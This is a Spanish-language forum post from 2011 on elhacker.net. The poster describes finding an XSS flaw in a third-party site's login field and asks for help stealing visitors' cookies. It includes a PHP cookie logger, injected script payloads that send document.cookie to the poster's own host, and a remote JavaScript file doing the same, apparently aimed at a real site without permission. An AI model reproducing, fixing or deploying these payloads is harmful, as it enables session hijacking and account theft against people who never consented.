Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: .:UND3R:. en 20 Marzo 2011, 17:48 pm


Título: Problema con XSS "java.sql.SQLException"
Publicado por: .:UND3R:. en 20 Marzo 2011, 17:48 pm
Hola a todos bueno les cuento estaba un poco aburrido y se me ocurrió indagar un poco y retomé con los xss y encontré una página con una vulnerabilidad xss
pero no en su buscador si no que en una parte para hacer login (Exactamente en la ID)
al momento de logearme erroneamente (poniendo una ID falsa y una clave) me marcaba el usuario xxx no existe, por lo que probé con codigos htm y walá tenia xss
así que preparé el escenario.. Subi mi cookie.php (http://lapaginaquetengo.com/cookies.php) con el siguiente código

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("datos.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

la petición:

Código:
http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script>window.location='http://paginamiaconcookie.com/cookies.php?cookie='+document.cookie;</script>&P_PASS=default&Submit=Aceptar

Pero al hacer las pruebas me Devuelve:
Citar
java.sql.SQLException
ORA-00907: missing right parenthesis

Y peor no se crea datos.txt con la información
La página tiene centos,está bajo Oracle y apache 2.2.3
Espero su ayuda muchas gracias por tomarse el tiempo de leer

EDIT:Buscando por internet, lei algo como colocar esto:
Código:
<script src=Http://host.com/javascript.js></script>
Cuando cargo la página introduciendo el script que mencioné anteriormente me sale que está cargando host.com/... por lo que creo que este método es factible corriganme si me equivoco, pero el problema surge en ¿que codigo.js debo colocar para poder adquirir la cookie del visitante?, si alguien me lo pudiera explicar se lo agradeceria, muchas gracias :D

EDIT2:
Encontré un codigo en js
hice lo siguiente:
Código:
<script language="javascript">
document.location="http://paginaquetengo.com/cookies.php?cookie=" + document.cookie;
</script>      
                                                                   

1-Lo guardé como login.js en http://paginaquetengo.com/login.js
junto con el cookie.php que anteriormente mencioné (http://lapaginaquetengo.com/cookies.php)
2-introducí en la página prueba:

Código:
http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script src=http://paginaquetengo.com/login.js></script>&P_PASS=default&Submit=Aceptar
Carga diciendo usuario no existe, verifico mi página pero esta no tiene el log (la página tiene la opción de escritura habilitada)

Espero ansiosamente su ayuda gracias x.x


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines